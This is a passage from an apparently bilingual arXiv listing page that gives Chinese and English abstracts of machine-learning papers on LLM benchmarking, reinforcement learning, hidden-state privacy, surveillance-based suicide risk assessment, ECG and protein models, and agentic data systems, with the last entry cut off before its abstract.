随着大型语言模型(LLM)从研究环境过渡到生产部署,评估其是否满足严格的服务水平目标(SLO)变得至关重要。然而,当前的评估方法在大规模下存在严重的测量偏差。我们证明,广泛使用的基准测试工具依赖于单进程、异步驱动架构,在高并发下引入了根本性的客户端排队瓶颈。通过将基准测试客户端建模为$M/G/1$队列,我们从数学上展示了Python全局解释器锁(GIL)如何随着请求速率增加而人为地膨胀首令牌时间(TTFT)和每输出令牌时间(TPOT)指标。为了解决这一系统性不准确性,我们提出了一个无偏的多进程评估框架,有效分散客户端负载,确保可忽略的排队开销。此外,我们形式化了一个复合指标——归一化每输出令牌时间(NTPOT),以稳健地摊销端到端延迟,包括跨序列长度的预填充和调度延迟。我们的实证评估表明,该方法成功隔离了纯服务引擎性能,能够在每秒数千个查询的生产规模下对LLM进行准确、可复现的性能分析。

英文摘要

As Large Language Models (LLMs) transition from research environments to production deployments, evaluating their performance against strict Service Level Objectives (SLOs) has become critical. However, current evaluation methodologies suffer from severe measurement bias at scale. We demonstrate that widely used benchmarking utilities rely on single-process, asyncio-driven architectures that introduce fundamental client-side queuing bottlenecks under high concurrency. By modeling the benchmarking client as an $M/G/1$ queue, we mathematically demonstrate how the Python Global Interpreter Lock (GIL) artificially inflates Time to First Token (TTFT) and Time Per Output Token (TPOT) metrics as request rates scale. To resolve this systematic inaccuracy, we propose an unbiased, multi-process evaluation framework that effectively distributes client-side load, ensuring negligible queuing overhead. Furthermore, we formalize a composite metric, Normalized Time Per Output Token (NTPOT), to robustly amortize end-to-end latency, including prefill and scheduling delays across sequence lengths. Our empirical evaluation demonstrates that this methodology successfully isolates pure serving engine performance, enabling accurate, reproducible profiling of LLMs at production scales exceeding thousands of queries per second.
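The queuing argument can be illustrated with the standard Pollaczek-Khinchine formula for the mean waiting time in an M/G/1 queue, W_q = λ·E[S²] / (2(1 − ρ)) with ρ = λ·E[S]. The sketch below is not the paper's model: the per-request client-side cost, the even split across processes, and the helper names are assumptions chosen to show how delay grows as a single-process client approaches saturation.

```python
def mg1_mean_wait(arrival_rate: float, mean_service: float, second_moment: float) -> float:
    """Mean queueing delay W_q of an M/G/1 queue (Pollaczek-Khinchine formula)."""
    rho = arrival_rate * mean_service  # utilization of the single server
    if rho >= 1.0:
        return float("inf")  # unstable: the queue grows without bound
    return arrival_rate * second_moment / (2.0 * (1.0 - rho))


def per_process_wait(total_rate: float, n_processes: int,
                     mean_service: float, second_moment: float) -> float:
    """Delay seen by each of n independent client processes sharing the load evenly."""
    return mg1_mean_wait(total_rate / n_processes, mean_service, second_moment)


if __name__ == "__main__":
    # Hypothetical client-side cost per request: 0.2 ms, deterministic.
    s = 0.0002
    for qps in (1000, 4000, 4900):
        single = mg1_mean_wait(qps, s, s * s)
        multi = per_process_wait(qps, 8, s, s * s)
        print(f"{qps} qps: single={single * 1e3:.3f} ms, 8 procs={multi * 1e3:.3f} ms")
```

Any delay of this kind is added on the client before the request reaches the server, so it would show up in measured TTFT even though the serving engine is not responsible for it.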

2605.24152 2026-05-27 cs.AI 版本更新

Neuro-Inspired Inverse Learning for Planning and Control

神经启发式逆向学习用于规划与控制

Maryna Kapitonova, Tonio Ball

发表机构 * NeuroMentum AI IMBIT, University of Freiburg, Germany(NeuroMentum AI IMBIT,弗赖堡大学,德国)

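AI summary Proposes Inverter, a neuro-inspired framework trained through Inverse Learning (IL) that combines forward/inverse internal models, open-loop multi-step motor commands, and hierarchical action organization for efficient inference in planning and control tasks, with an average improvement of 24.2% and one to two orders of magnitude less compute time.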

Comments Version 2, minor fix in online version of the abstract, pdf unchanged

详情
AI中文摘要

我们提出了一种用于具身规划与控制的神经启发式框架。基于哺乳动物大脑中实现快速高效目标导向行为的三个原则——配对的前向/逆向内部模型、开环多步运动指令以及顺序层次化的动作组织——我们的Inverter框架使用学习组件,通过逆向学习(IL)进行端到端训练,并在自然情况下辅以解析或算法模块;我们形式化了IL,并将其与监督学习、强化学习和模仿学习区分开来。IL桥接了强化学习(RL)式的摊销(单次前向传播但每次只输出一个动作)和最优控制(OC)式的序列规划(整个轨迹但需要迭代测试时计算)。单个Inverter或层次化n=2的Inverter堆栈在所有3个maze2d和6个antmaze D4RL变体上,平均比离线RL和扩散规划基线提升24.2%(范围-1.9%至+78.2%),同时推理计算时间减少一到两个数量级。显著的是,通过前向模型(FoM)对整个T步动作序列进行优化(而非逐步骤优化),使得Inverter能够生成平滑、目标一致、轨迹级的结构,并达到比训练数据本身所蕴含的策略更接近解析最优的控制策略。我们还发现了IL的一种失败模式:在训练数据覆盖范围狭窄时出现FoM攻击,我们通过使用覆盖范围更广的随机训练数据来缓解。作为一个应用实例,脉冲Inverter合成任意单量子比特量子门,其保真度与标准迭代数值基线(GRAPE)相当,而每个门的计算时间降低超过1000倍。总之,我们得出结论:IL实现了一类通用的世界接口,特别适用于对延迟和资源敏感的具身AI。

英文摘要

We present a neuro-inspired framework for embodied planning and control. Building on three principles that enable fast and highly effective goal-directed behavior in the mammalian brain - paired forward/inverse internal models, open-loop multi-step motor commands, and sequential, hierarchical organization of action - our Inverter framework uses learned components, trained end-to-end through Inverse Learning (IL) and supplemented where natural by analytic or algorithmic modules; we formalize IL and delineate it from supervised, reinforcement, and imitation learning. IL bridges Reinforcement Learning (RL)-style amortization, which runs in a single forward pass but emits only one action at a time, and Optimal Control (OC)-style sequence planning over whole trajectories, but with iterative test-time computation. Single Inverters or hierarchical n=2 Inverter stacks match or improve on offline-RL and diffusion-planner baselines on all 3 maze2d and 6 antmaze D4RL variants by an average of +24.2% (range -1.9% to +78.2%), at one-to-two orders of magnitude less inference compute time. Distinctively, optimizing through the Forward Model (FoM) over the entire T-step action sequence - rather than per step - lets Inverters produce smooth, goal-coherent, trajectory-wide structure and reach control policies closer to the analytic optimum than the policy underlying the training data itself. We also identify a failure mode of IL: FoM hacking under narrow training-data coverage, which we mitigate by using random training data with broader coverage. As an application example, a Pulse Inverter synthesizes arbitrary single-qubit quantum gates with fidelity matching the standard iterative numerical baseline (GRAPE), at more than 1000x lower per-gate compute time. In summary, we conclude that IL enables a versatile class of world-interfaces, especially for latency- and resource-critical embodied AI.

2605.24071 2026-05-27 cs.LG cs.AI 版本更新

Not All Transitions Matter: Evidence from PPO

并非所有转移都重要:来自PPO的证据

Ajhesh Basnet

发表机构 * Department of Artificial Intelligence and Data Science(人工智能与数据科学系) KPR Institute of Engineering and Technology(KPR工程科技研究院)

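AI summary Proposes randomly dropping a fixed fraction of rollout transitions during PPO training to break the repetitive gradient structure and stabilize training, and validates the effect across several environments.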

Comments 19 pages, 5 figures. Accepted to 2026 8th Asia Conference on Machine Learning and Computing (ACMLC 2026)

详情
Journal ref
Proceedings of the 2026 8th Asia Conference on Machine Learning and Computing
AI中文摘要

在策略上训练强化学习代理意味着每次更新时收集新的经验,而这些经验隐藏着一个问题。轨迹中的每个状态都是前一个状态的直接输出,由代理自身的动作因果链连接。因此,连续的转移从未真正独立。它们携带重叠信息,网络接收到的梯度信号最终比批次大小所暗示的要重复得多。相同的方向被反复强化,价值网络在策略变化时难以跟上,训练变得悄悄不稳定,而仅凭奖励曲线很少能揭示这一点。本文询问这种冗余是否可以简单地移除。我们表明,在适当阶段从轨迹中随机丢弃固定比例的转移,使得奖励信号保持完整,足以打破重复的梯度结构并稳定训练。变化很小:一个采样步骤,没有新组件,不修改核心算法,并且适用于任何PPO实现。在五个难度递增的环境(CartPole-v1、Acrobot-v1、LunarLander-v2、HalfCheetah-v5和Hopper-v5)中,该方法在奖励上与标准PPO匹配,同时在KL散度、策略熵和价值估计上产生更一致的训练动态。丢弃25%的转移是最佳点:足以破坏冗余,又不至于使批次过薄。

英文摘要

Training a reinforcement learning agent on-policy means collecting fresh experience at every update, and that experience comes with a hidden problem. Each state in a rollout is the direct output of the previous one, causally chained together by the agent's own actions. Because of this, consecutive transitions are never truly independent. They carry overlapping information, and the gradient signal the network receives ends up far more repetitive than the batch size suggests. The same directions get reinforced over and over, the value network struggles to keep up as the policy shifts, and training becomes quietly unstable in ways that reward curves alone rarely reveal. This paper asks whether that redundancy can simply be removed. We show that randomly dropping a fixed fraction of transitions from the rollout, at the right stage so the reward signal stays intact, is enough to break the repetitive gradient structure and stabilize training. The change is minimal: one sampling step, no new components, no modification to the core algorithm, and it works with any PPO implementation. Across five environments of increasing difficulty, CartPole-v1, Acrobot-v1, LunarLander-v2, HalfCheetah-v5, and Hopper-v5, the method matches vanilla PPO on reward while producing more consistent training dynamics across KL divergence, policy entropy, and value estimates. Dropping 25% of transitions turns out to be the sweet spot: enough to disrupt the redundancy, not enough to thin the batch.
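A minimal sketch of the sampling step, assuming that "the right stage" means after returns and advantages have been computed over the full rollout, so that the reward signal is unaffected by the drop. That reading, the field names, and the helper `drop_transitions` are assumptions for illustration, not the author's implementation.

```python
import random


def drop_transitions(batch, drop_fraction=0.25, rng=None):
    """Randomly drop a fixed fraction of transitions from a processed rollout.

    batch: dict mapping field names (e.g. "obs", "actions", "log_probs",
    "advantages", "returns") to equal-length lists, one entry per transition.
    Call this only after advantages and returns were computed on the full
    rollout (assumption), then run the usual PPO update on the result.
    """
    rng = rng or random.Random()
    lengths = {len(values) for values in batch.values()}
    if len(lengths) != 1:
        raise ValueError("all fields must have the same length")
    n = lengths.pop()
    if n == 0:
        return batch
    n_keep = max(1, round(n * (1.0 - drop_fraction)))
    # Keep the same indices in every field so transitions stay aligned.
    keep = sorted(rng.sample(range(n), n_keep))
    return {name: [values[i] for i in keep] for name, values in batch.items()}


# Toy rollout of 8 transitions with precomputed returns (hypothetical values).
rollout = {"obs": list(range(8)), "returns": [10 * t for t in range(8)]}
print(drop_transitions(rollout, drop_fraction=0.25, rng=random.Random(0)))
```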

2605.24042 2026-05-27 cs.LG cs.AI 版本更新

Hidden-State Privacy Has an Empty Middle

隐藏状态隐私存在空中间

Alexander Okezue Bell

发表机构 * Stanford University(斯坦福大学)

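AI summary Through a theoretical lower bound and experiments, shows that Gaussian release mechanisms for hidden-state privacy cannot achieve moderate utility and moderate privacy at the same time, leaving an empty middle, and identifies the diagonal inverse-Fisher mechanism as the minimax-optimal diagonal release.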

Comments 74 pages, 61 figures

详情
AI中文摘要

在我们测试的1536个高斯释放协方差中,对于单层隐藏状态隐私,没有一个能在自适应检索攻击者下同时实现中等效用和中等隐私。我们证明了一个互补的Fisher球下界:每个具有O(1) Fisher效用的满秩高斯释放都存在一个方向,其马氏信号随隐藏宽度线性增长,排除了该类中的均匀高斯安全性,并与经验上的空中间匹配。对角逆Fisher释放Σ^⋆_{diag}(K) = (2K/d) diag(1/F_{ii})是在一阶KL预算K下唯一的最小最大最优对角机制,也是在32个模型层网格的每个点上最坏攻击者top-1 ≤ 0.001的唯一释放,但它位于隐私/效用边界上,而不是填充中间。在欧几里得检索下达到13倍帕累托缩减的广义特征机制,在自适应马氏攻击者下崩溃为100% top-1,而全轨迹序列逆变器恢复了干净GPT-2前缀的94%,但在Σ_{diag}下为0%。从头训练的分离记忆Transformer在90M时达到G_{Mah} ∈ [20, 33],并在固定token语言建模损失惩罚下,从30M到1B保持比相同预算GPT基线6-24倍的优势;预训练模型最高为9.3。这些结果将隐藏状态释放从高斯类内的机制设计重新定义为架构或释放协同设计。

英文摘要

Of $1{,}536$ Gaussian release covariances we tested for single-layer hidden-state privacy, zero achieve both moderate utility and moderate privacy against an adaptive retrieval attacker. We prove a complementary Fisher-ball lower bound: every full-rank Gaussian release at $O(1)$ Fisher utility admits a direction whose Mahalanobis signal grows linearly in hidden width, ruling out uniform Gaussian safety in the class and matching the empirical empty middle. The diagonal inverse-Fisher release $\Sigma^\star_{\mathrm{diag}}(\mathcal{K}) = (2\mathcal{K}/d)\,\mathrm{diag}(1/F_{ii})$ is the unique minimax-optimal diagonal mechanism at first-order KL budget $\mathcal{K}$ and the only release with worst-attacker top-1 $\le 0.001$ at every point of a 32 model-layer grid, but it sits on a privacy/utility edge rather than filling the middle. A generalized-eigen mechanism reaching $13\times$ Pareto reduction under Euclidean retrieval collapses to $100\%$ top-1 under the adaptive Mahalanobis attacker, and a full-trajectory sequence inverter recovers $94\%$ of clean GPT-2 prefixes but $0\%$ under $\Sigma_{\mathrm{diag}}$. A split-memory transformer trained from scratch reaches $G_{\mathrm{Mah}} \in [20, 33]$ at 90M and maintains a $6$--$24\times$ advantage over same-budget GPT baselines from 30M to 1B at a fixed-token language-modeling loss penalty; pretrained models top out at 9.3. These results reframe hidden-state release from mechanism-design within the Gaussian class to architecture or release co-design.
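The closed form for the diagonal inverse-Fisher release can be turned into a short numerical sketch. The function names and the toy Fisher diagonal below are hypothetical, and the budget check assumes that the first-order KL cost of a Gaussian release with covariance Sigma is one half of the trace of F times Sigma; the abstract does not spell that convention out.

```python
import numpy as np

def diag_inverse_fisher_variances(fisher_diag, kl_budget):
    """Diagonal of (2K/d) * diag(1 / F_ii), as written in the abstract."""
    fisher_diag = np.asarray(fisher_diag, dtype=float)
    d = fisher_diag.size
    return (2.0 * kl_budget / d) / fisher_diag

def release(hidden, fisher_diag, kl_budget, rng):
    """Add zero-mean Gaussian noise with the diagonal covariance above."""
    variances = diag_inverse_fisher_variances(fisher_diag, kl_budget)
    return hidden + rng.normal(size=hidden.shape) * np.sqrt(variances)

rng = np.random.default_rng(0)
F_diag = rng.uniform(0.1, 10.0, size=768)  # toy Fisher diagonal, not real data
K = 0.5                                    # toy KL budget
variances = diag_inverse_fisher_variances(F_diag, K)

# Assumed first-order KL cost: 0.5 * trace(F @ Sigma) for diagonal F and Sigma.
first_order_kl = 0.5 * np.sum(F_diag * variances)

noisy = release(rng.normal(size=768), F_diag, K, rng)
```

Under that assumed cost, every coordinate contributes the same share K/d, so the total equals the budget K regardless of how uneven the Fisher diagonal is.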

2605.24001 2026-05-27 cs.CV cs.AI cs.LG 版本更新

Diff-Instruct with Diffused Reward: Towards Principled One-step Generator RL

Diff-Instruct with Diffused Reward: 迈向有原则的一步生成器强化学习

Junyi Wu, Weijian Luo, Haoyang Zheng, Ruizhe Zhang, Guang Lin

发表机构 * Purdue University(普渡大学) hi-lab, Xiaohongshu Inc.(小红书实验室,小红书公司)

AI总结 针对一步生成器强化学习中奖励优化与生成动力学不匹配的问题,提出基于积分KL最小化的无数据轨迹级对齐框架DIDR,通过扩散奖励分数和代理估计器实现奖励驱动的校正,在一步SDXL和6B DiT骨干网络上取得帕累托优势。

Comments author list correction

详情
AI中文摘要

近期一步文本到图像生成的进展实现了实时合成,具有显著的效率和质量。先前用于一步生成器的强化学习方法将图像空间奖励优化与扩散噪声空间分布匹配相结合。这种范式由于终端奖励优化与底层生成动力学之间的不匹配带来了挑战。结果,优化倾向于利用随机自由度,通常以牺牲图像保真度为代价来提高奖励。为了解决这个问题,我们提出了Diff-Instruct with Diffused Reward (DIDR),一个从积分KL最小化推导出的无数据轨迹级对齐框架。DIDR将RLHF最优的奖励倾斜干净图像分布沿扩散轨迹传播到所有噪声水平。我们证明该目标与干净图像RLHF具有相同的最小化器,同时自然诱导出扩散奖励分数(DRS),它作为对参考分数函数的奖励驱动校正。为了使其实用,我们进一步引入了扩散奖励代理(DRP),一种基于可微短步去噪的DRS高效估计器。大量实验表明,DIDR持续帕累托主导现有的一步SDXL基线。此外,当迁移到6B DiT骨干网络(Z-Image)时,DIDR在偏好对齐上超越了其50步教师模型,同时仅需单步生成。

英文摘要

Recent advances in one-step text-to-image generation have enabled real-time synthesis with remarkable efficiency and quality. Previous reinforcement learning methods for one-step generators combine image-space reward optimization with diffusion noisy-space distribution matching. This paradigm brings challenges due to a mismatch between terminal reward optimization and the underlying generative dynamics. As a result, optimization tends to exploit stochastic degrees of freedom, often improving reward at the expense of image fidelity. To address this issue, we propose Diff-Instruct with Diffused Reward (DIDR), a data-free trajectory-level alignment framework derived from Integral KL minimization. DIDR propagates the RLHF-optimal reward-tilted clean-image distribution across all noise levels along the diffusion trajectory. We show that this objective admits the same minimizer as clean-image RLHF, while naturally inducing the Diffused Reward Score (DRS), which acts as a reward-driven correction to the reference score function. To make this practical, we further introduce the Diffused Reward Proxy (DRP), an efficient estimator of DRS based on differentiable short-step denoising. Extensive experiments demonstrate that DIDR consistently Pareto-dominates existing one-step SDXL baselines. Moreover, when transferred to a 6B DiT backbone (Z-Image), DIDR surpasses its 50-step teacher in preference alignment while requiring only a single generation step.

2605.22904 2026-05-27 cs.CV cs.AI 版本更新

Suicide Risk Assessment from AI-powered Video Surveillance: An Interpretable Framework for Prevention in Metro Stations

基于AI视频监控的自杀风险评估:地铁站预防的可解释框架

Safwen Naimi, Wassim Bouachir, Guillaume-Alexandre Bilodeau, Brian Mishara

发表机构 * Université TÉLUQ(TÉLUQ大学) Polytechnique Montréal(蒙特利尔理工学院) Université du Québec à Montréal(魁北克大学蒙特利尔分校)

AI总结 提出首个可解释框架,通过行人跟踪、活动识别、站台语义分割和轨迹风险热图建模,从监控视频中评估自杀风险,在真实数据上达到83.2% ROC-AUC。

Comments 9 pages, 6 figures, 1 table. Accepted for publication at the International Joint Conference on Artificial Intelligence (IJCAI)

详情
AI中文摘要

理解并监控地铁站中的人类行为对于支持自杀预防工作至关重要,早期识别高风险情况能够实现及时干预。这需要通过对每个乘客的行为、其空间上下文和时间动态进行联合推理,从监控视频中评估自杀风险。然而,使用监控摄像头捕获的视频进行评估具有挑战性,因为它需要准确感知人体运动、理解站台几何结构,并随时间聚合异质行为线索。在这项工作中,我们正式定义了地铁站自杀风险评估(SRA)任务,并引入了首个解决这一挑战的可解释框架。与专注于孤立子任务或试图直接推断意图的方法不同,我们的公式通过整合行人跟踪、活动识别、站台语义分割和轨迹驱动的风险热图建模,从累积证据中评估自杀风险。通过将SRA形式化为一个独特任务,并在真实监控数据上基准测试一个完整的操作流程,实现了83.2%的ROC-AUC,这项工作突出了自杀风险评估的复杂性,并为面向社会公益的可解释AI系统研究开辟了新方向。

英文摘要

Understanding and monitoring human behavior in metro stations play an important role in supporting suicide prevention efforts, where early identification of high-risk situations can enable timely intervention. This requires assessing suicide risk from surveillance video by jointly reasoning about each passenger's behavior, spatial context, and temporal dynamics. However, assessment from surveillance-camera video is challenging, as it demands accurate perception of human motion, understanding of platform geometry, and aggregation of heterogeneous behavioral cues over time. In this work, we formalize the task of Suicide Risk Assessment (SRA) in metro stations and introduce the first interpretable framework that addresses this challenge. Unlike approaches that focus on isolated subtasks or attempt to infer intent directly, our formulation assesses suicide risk from accumulated evidence by incorporating person tracking, activity recognition, semantic segmentation of the platform, and trajectory-driven risk heatmap modeling. By formalizing SRA as a distinct task and benchmarking a complete operational pipeline that achieves 83.2% ROC-AUC on real surveillance data, this work highlights the complexity of suicide risk assessment and opens new directions for research on interpretable AI systems for social good.

2605.22774 2026-05-27 cs.LG cs.AI cs.HC 版本更新

CogAdapt: Transferring Clinical ECG Foundation Models to Wearable Cognitive Load Assessment via Lead Adaptation

CogAdapt: 通过导联适应将临床心电图基础模型迁移至可穿戴认知负荷评估

Amir Mousavi, Erfan Nourbakhsh, Mohammad Sadegh Sirjani, Mimi Xie, Rocky Slavin, Leslie Neely, John Davis, John Quarles

发表机构 * Department of Computer Science, College of AI, Cyber and Computing, The University of Texas at San Antonio(计算机科学系,人工智能、网络与计算学院,德克萨斯大学圣安东尼奥分校) Department of Educational Psychology, College of Education and Human Development, The University of Texas at San Antonio(教育心理学系,教育与人类发展学院,德克萨斯大学圣安东尼奥分校)

AI总结 提出CogAdapt框架,通过可学习适配器LeadBridge将3导联可穿戴信号转换为12导联表示,并结合渐进微调策略ProFine,实现临床心电图基础模型向可穿戴认知负荷评估的迁移,在跨受试者验证中显著优于从头训练的基线模型。

Comments 7 pages, 7 figures. Submitted to IEEE-EMBS International Conference on Biomedical and Health Informatics (BHI 2026)

详情
AI中文摘要

实时认知负荷评估对于自适应人机交互至关重要,但由于标记数据有限和跨受试者泛化能力差,仍然具有挑战性。最近在数百万临床记录上预训练的心电图基础模型提供了丰富的表示,但由于传感器配置不匹配和任务差异,无法直接应用于可穿戴设备。在本文中,我们提出了CogAdapt,一个将临床心电图基础模型适应于可穿戴认知负荷评估的框架。CogAdapt引入了LeadBridge,一个可学习的适配器,将3导联可穿戴信号转换为解剖学一致的12导联表示,以及ProFine,一种渐进微调策略,逐步解冻编码器层同时防止灾难性遗忘。在两个公共数据集(CLARE和CL-Drive)上的留一受试者交叉验证评估表明,CogAdapt显著优于从头训练的基线,宏F1分数分别达到0.626和0.768。这些结果证明了基础模型适应用于从可穿戴传感器进行与受试者无关的认知负荷评估的前景。

英文摘要

Real-time cognitive load assessment is essential for adaptive human-computer interaction but remains challenging due to limited labeled data and poor cross-subject generalization. Recent ECG foundation models pre-trained on millions of clinical recordings offer rich representations, but cannot be directly applied to wearable devices due to sensor configuration mismatch and task differences. In this paper, we propose CogAdapt, a framework that adapts clinical ECG foundation models to wearable cognitive load assessment. CogAdapt introduces LeadBridge, a learnable adapter that transforms 3-lead wearable signals into anatomically consistent 12-lead representations, and ProFine, a progressive fine-tuning strategy that gradually unfreezes encoder layers while preventing catastrophic forgetting. Evaluations on two public datasets (CLARE and CL-Drive) under leave-one-subject-out cross-validation show that CogAdapt substantially outperforms baselines trained from scratch, achieving macro-F1 scores of 0.626 and 0.768. These results demonstrate the promise of foundation model adaptation for subject-independent cognitive load assessment from wearable sensors.

2605.22133 2026-05-27 q-bio.BM cs.AI 版本更新

Atom-level Protein Representation Learning Improves Protein Structure Prediction

原子级蛋白质表示学习改进蛋白质结构预测

Taewon Kim, Hyosoon Jang, Hyunjin Seo, Seonghwan Seo, Hyeongwoo Kim, Wonho Zhung, Mingyeong Shin, Wooyoun Kim, Sungsoo Ahn

发表机构 * KAIST(韩国科学技术院)

AI总结 提出结构感知预训练方法TriProRep,通过VQ-VAE联合建模三种对齐的残基级视图,在结构预测任务中优于仅序列和先前结构感知表示模型。

Comments Project Page: https://holymollyhao.github.io/TriProRep/

详情
AI中文摘要

生成建模的最新进展表明,预训练表示可以作为条件特征或对齐目标来改进生成。受此启发,我们研究用于预测结构(超越常规功能注释)的蛋白质表示。我们提出TriProRep,一种结构感知预训练方法,它联合建模三种对齐的残基级视图:氨基酸身份、主链几何和局部全原子几何,通过VQ-VAE分词器进行离散编码。通过预训练从生成器损坏的视图中恢复原始标记,TriProRep学会区分合理但不正确的跨视图增强与原始蛋白质。我们进一步引入RepSP,一个用于在结构预测设置中评估蛋白质表示的基准。RepSP测试表示的三种用途:从脱辅基链表示进行同源二聚体共折叠、同源二聚体衍生相互作用属性的残基级预测,以及表示对齐的单体结构预测。在这些任务中,TriProRep优于仅序列和先前的结构感知表示模型,同时在常规基准上保持竞争性能。

英文摘要

Recent advances in generative modeling show that pretrained representations can improve generation as conditioning features or alignment targets. Motivated by this, we study protein representations for predicting structures beyond conventional function annotation. We propose TriProRep, a structure-aware pretraining method that jointly models three aligned residue-level views: amino-acid identity, backbone geometry, and local full-atom geometry, discretely encoded via VQ-VAE tokenizers. By pretraining to recover original tokens from generator-corrupted views, TriProRep learns to distinguish plausible but incorrect cross-view augmentations from the original protein. We further introduce RepSP, a benchmark for evaluating protein representations in structure-predictive settings. RepSP tests three uses of representations: homodimer co-folding from apo-chain representations, residue-level prediction of homodimer-derived interaction properties, and representation-aligned monomer structure prediction. Across these tasks, TriProRep improves over sequence-only and prior structure-aware representation models, while maintaining competitive performance on conventional benchmarks.

2605.20988 2026-05-27 cs.LG cs.AI 版本更新

A Sharper Picture of Generalization in Transformers

Transformer 泛化能力的更清晰图景

Paul Lintilhac, Sair Shaikh

发表机构 * Thayer School of Engineering Dartmouth College(达特茅斯学院泰勒工程学院)

AI总结 本文通过PAC-Bayes理论研究Transformer在布尔域上的泛化行为,证明稀疏低阶频谱可实现低锐度构造并得到非平凡的泛化界,解释了思维链为何能改善高阶目标函数的泛化。

Comments 10 pages, 9 figures, 41 pages of supplementary material

详情
AI中文摘要

我们从目标函数的傅里叶谱角度研究Transformer在布尔域上的泛化行为。与先前基于Rademacher复杂度推导泛化界的工作(Edelman等人,2022;Trauger & Tosh,2024)不同,我们探讨了通过PAC-Bayes理论获得泛化界的可行性。我们证明,集中在低阶分量上的稀疏谱能够实现具有良好泛化性质的低锐度构造。我们的思路是证明存在实现任何稀疏度不超过上下文长度的布尔函数的平坦极小值,然后将PAC-Bayes界应用于一个理想化的低锐度学习器,从而得到一个非平凡的泛化界。我们利用这一点正式解释了为什么思维链能改善高阶目标函数的泛化,并展示了我们界中的复杂度参数可以通过性质测试高效估计。我们通过实验评估了预测,并进行了机制可解释性研究,以支持我们的理论构造在真实Transformer中的现实性。

英文摘要

We study transformers' generalization behavior on boolean domains from the perspective of the Fourier spectra of their target functions. In contrast to prior work (Edelman et al., 2022; Trauger & Tosh, 2024), which derived generalization bounds from Rademacher complexity, we investigate the feasibility of obtaining generalization bounds via PAC-Bayes theory. We show that sparse spectra concentrated on low-degree components enable low-sharpness constructions with good generalization properties. Our idea is to show the existence of flat minima implementing any boolean function of sparsity no greater than the context length, and then apply a PAC-Bayes bound to an idealized low-sharpness learner, resulting in a non-vacuous generalization bound. We use this to give a formal account of why chain-of-thought improves generalization for high-degree target functions, and show that the complexity parameters in our bound can be efficiently estimated via property testing. We evaluate predictions empirically and conduct a mechanistic interpretability study to support the realism of our theoretical construction in real transformers.
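To make "sparse spectra concentrated on low-degree components" concrete, the following sketch computes the Fourier expansion of a small boolean function over {-1, +1}^n by brute force and reports its sparsity and degree. The helper names are illustrative and the enumeration is exponential in n, so this is only meant for toy inputs; it is not the property-testing estimator mentioned in the abstract.

```python
import itertools
import numpy as np

def fourier_coefficients(f, n):
    """Return {S: f_hat(S)}, where f_hat(S) = E_x[f(x) * prod_{i in S} x_i]."""
    points = np.array(list(itertools.product([-1, 1], repeat=n)))
    values = np.array([f(x) for x in points], dtype=float)
    coeffs = {}
    for size in range(n + 1):
        for S in itertools.combinations(range(n), size):
            # Character chi_S(x); the empty product is 1 for S = ().
            chi = np.prod(points[:, list(S)], axis=1)
            coeffs[S] = float(np.mean(values * chi))
    return coeffs

def spectrum_summary(coeffs, tol=1e-9):
    """Sparsity = number of nonzero coefficients; degree = largest |S| among them."""
    support = [S for S, c in coeffs.items() if abs(c) > tol]
    return {"sparsity": len(support),
            "degree": max((len(S) for S in support), default=0)}

def parity(x):
    return x[0] * x[1] * x[2]

def majority(x):
    return 1 if x.sum() > 0 else -1

parity_spec = fourier_coefficients(parity, 3)
majority_spec = fourier_coefficients(majority, 3)
parity_summary = spectrum_summary(parity_spec)
majority_summary = spectrum_summary(majority_spec)
```

Three-bit parity has a single nonzero coefficient, but it sits at the top degree, whereas majority spreads most of its weight over degree-1 terms. High-degree targets such as parity are the case the abstract singles out when discussing chain-of-thought.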

2605.20690 2026-05-27 cs.AI 版本更新

Declarative Data Services: Structured Agentic Discovery for Composing Data Systems

声明式数据服务:用于组合数据系统的结构化智能体发现

Shanshan Ye, Duo Lu

发表机构 * Northeastern University(东北大学) Brown University(布朗大学)

AI总结 提出声明式数据服务(DDS)架构,通过分层类型契约将全局搜索分解为有界子搜索,解决无界智能体发现无法稳定收敛的问题,并在交易后端工作负载上验证其有效性。

Comments Accepted at AI Agents for Discovery in the Wild (AID-Wild), Workshop at ACM CAIS 2026

详情
AI中文摘要

智能体发现已表明,在基准条件下,LLM驱动的搜索能够发现新颖的算法、设计和代码。将该范式迁移到多系统数据后端面临一个更困难的问题:搜索空间是异构的,验证器是部署栈是否实际运行,且组合知识在预训练中不均匀地捕获。即使添加了迭代和显式组合知识,无界智能体发现(一个基于失败日志反馈迭代的编码智能体)也无法在运行栈上一致收敛。我们提出声明式数据服务(DDS),一种从声明式用户意图中结构化智能体发现数据系统组合的架构。该框架在连续层(意图、操作DAG、每系统技能、运行时归因)拥有四个类型契约,将全局搜索分解为有界子搜索;子智能体搜索每个类型空间,而框架提供通道,使知识以内联技能引用的方式向前流动,错误以类型信号的方式向后路由。作为交易后端工作负载的生命证明,DDS在无界发现无法收敛的地方收敛;运行时失败成为技能补丁,下一次部署内联引用。我们将其定位为早期原型,报告来自真实世界数据系统组合的经验教训。

英文摘要

Agentic discovery has shown that LLM-driven search can find novel algorithms, designs, and code under benchmark conditions. Translating the paradigm to multi-system data backends surfaces a harder problem: the search space is heterogeneous, the verifier is whether a deployed stack actually runs, and composition knowledge is unevenly captured in pretraining. Unbounded agentic discovery, a coding agent iterating on failure-log feedback, fails to converge consistently on a working stack even when iteration and explicit composition knowledge are added. We propose Declarative Data Services (DDS), an architecture for structured agentic discovery of data-system compositions from declarative user intent. The framework owns four typed contracts at successive layers (intent, operator DAG, per-system skills, runtime attribution) that decompose the global search into bounded sub-searches; sub-agents search each typed space, while the framework provides the channels by which knowledge flows forward as inline skill citations and errors route backward as typed signals. As a proof of life on a trading-backend workload, DDS converges where unbounded discovery does not; runtime failures become skill patches that the next deployment cites inline. We position this as an early prototype reporting lessons from real-world data-system composition.

2605.20255 2026-05-27 cs.LG cs.AI cs.HC cs.RO 版本更新

Multi-Agent Reinforcement Learning for Safe Autonomous Driving Under Pedestrian Behavioral Uncertainty

行人行为不确定性下安全自动驾驶的多智能体强化学习

Prakash Aryan, Kaushik Raghupathruni, Timo Kehrer, Sebastiano Panichella

发表机构 * University of Bern(伯尔尼大学) AI4I, The Italian Institute of Artificial Intelligence(意大利人工智能研究所)

AI总结 本文使用多智能体近端策略优化(MAPPO)联合训练自动驾驶汽车和12个行人,通过隐藏的行人特质模拟乱穿马路行为,相比固定策略基线显著降低了碰撞率,并揭示了速度差异指标可用于检测未预期的乱穿马路行为。

Comments Accepted to ICRA 2026 Workshop "8th Workshop on Long-term Human Motion Prediction"

详情
AI中文摘要

